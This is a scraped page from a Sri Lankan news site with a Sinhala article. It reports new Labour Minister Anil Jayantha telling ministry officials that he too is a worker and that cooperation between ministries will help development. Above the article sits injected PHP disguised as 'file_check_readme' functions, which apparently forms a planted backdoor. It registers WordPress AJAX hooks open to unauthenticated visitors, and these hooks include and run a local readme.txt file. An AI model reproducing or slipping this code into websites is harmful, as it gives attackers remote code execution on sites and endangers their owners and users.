if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඇමති වුනත් මමත් කම්කරුවෙක්..- නව කම්කරු ඇමති - mediahumanrights.lk
mediahumanrights.lk
News Political

ඇමති වුනත් මමත් කම්කරුවෙක්..- නව කම්කරු ඇමති

සැබෑ අර්ථයෙන්ම ආර්ථික ක්‍රියාවලියේදී ශ්‍රම බලකාය තුළ අමාත්‍යවරයා ලෙස තමා ද අන් අය මෙන්ම තවත් එක් ශ්‍රමිකයකු පමණක් බවත්, සෑම අයෙකුම ඒ බව තේරුම් ගෙන කටයුතු කිරීම මගින් ශක්තිමත් ඵලදායී ශ්‍රම බලකායක් පිළිබඳව වන රජයේ අපේක්ෂාව ඉටුකර ගත හැකි බවත් නව කම්කරු අමාතයවරයා ලෙස පත්වූ මහාචාර්ය අනිල් ජයන්ත මහතා පැවසීය.

අමාත්‍යවරයා මේ බව පැවසුවේ නාරාහේන්පිට “මෙහෙවර පියෙස” ගොඩනැගිල්ලෙහි පිහිටි කම්කරු අමාත්‍යාංශයේදී වැඩ බාරගැනීමේ අවස්ථාවට එක්ව සිටි අමාත්‍යාංශයේ සහ ඊට අයත් ආයතනවල නිලධාරීන් අමතමිනි.

එහිදී වැඩිදුරටත් අදහස් දැක්වූ අමාත්‍යවරයා මෙසේ ද පැවසීය.

“වත්මන් ආණ්ඩුවට ලැබී ඇති ජනවරම විශේෂ ජනවරමක්. ඒක අපි හැමෝම තේරුම් ගත යුතුයි. ආණ්ඩුව විදිහට අපිට අවශ්‍ය කරන්නෙ ජනතාව විසින් ඒ සුවිශේෂී ජනවරම මගින් අනුමත කරන ලද ප්‍රතිපත්ති ප්‍රකාශයෙහි සඳහන් කරුණු ඉටු කර ගැනීම පමණයි.  එහිදී නිලධාරීන් විදිහට තම තමන් දරන දේශපාලන මතයට බාධා කිරීමේ අදහසක් අපිට නැහැ.

කම්කරු කියන වචනයට අතීතයේදී කුමන වටිනාකමක් ලැබුණ ද වර්තමානයේදී උසස් රැකියාවන්හි නියැලී ඉන්න අය කම්කරුවන් නෙමෙයි වගේ කියන හැඟීමක් තමයි සමාජගත වෙලා තියෙන්නෙ. නමුත්, ඒක එහෙම නෙමෙයි. ඇමතිවරයා වන මමත් කම්කරුවෙක් තමයි ආර්ථිකය ඇතුළෙ ශ්‍රම බලකාය විදිහට ගත්තහම. අපි හැමෝම ශ්‍රමයේ කොටස්කරුවන්. ඒ නිසා, මානව සම්පත එක්ක ශ්‍රමය කියන එක හරියට දියුණු කරගෙන පාවිච්චි කරන්න අපට පුළුවන් උනොත් අපට අපේ රට ඉතාම ඉක්මනින් සංවර්ධනය කරගැනීමේ හැකියාව ලැබෙනව. මේ අරමුණ ඉටුකර ගැනීමේදී පෙර පැවති ආණ්ඩුවලට වඩා අපට තියෙන විශේෂම වාසිය තමයි වත්මන් ආණ්ඩුවේ අමාත්‍යාංශ අතර තියෙන සහයෝගය. ඒ නිසා අපට මේ අමාත්‍යාංශයේ දැක්ම සහ මෙහෙවර ඉටුකර ගැනීමට ඒ සහයෝගය වඩාත් පහසු වනු ඇති බවයි මගේ අදහස.”

අමාත්‍යාංශයේ විෂය පථයට අදාලව  ජනතාව එදිනෙදා මුහුණ දෙන ප්‍රශ්ණ සහ ගැටළුවලට කඩිනම් විසඳුම් ලබාදීම කෙරෙහි තමන් වැඩි අවධානයක් යොමු කරන බව ද අමාත්‍යවරයා මෙහිදී අවධාරණය කළේය.

Related posts

අධිවේගී මාර්ගය භාවිතකරන්නන්ගේ සංඛ්‍යාව ඉහළ ගිහින්

Shiran Viraj

රිලවු අල්ලන ව්‍යාපෘතිය සාර්තකයි..

Shiran Viraj

ගාල්ලේ පාසල් 26ක දරුවන් 43 දෙනෙකුට කොරෝනා

Shiran Viraj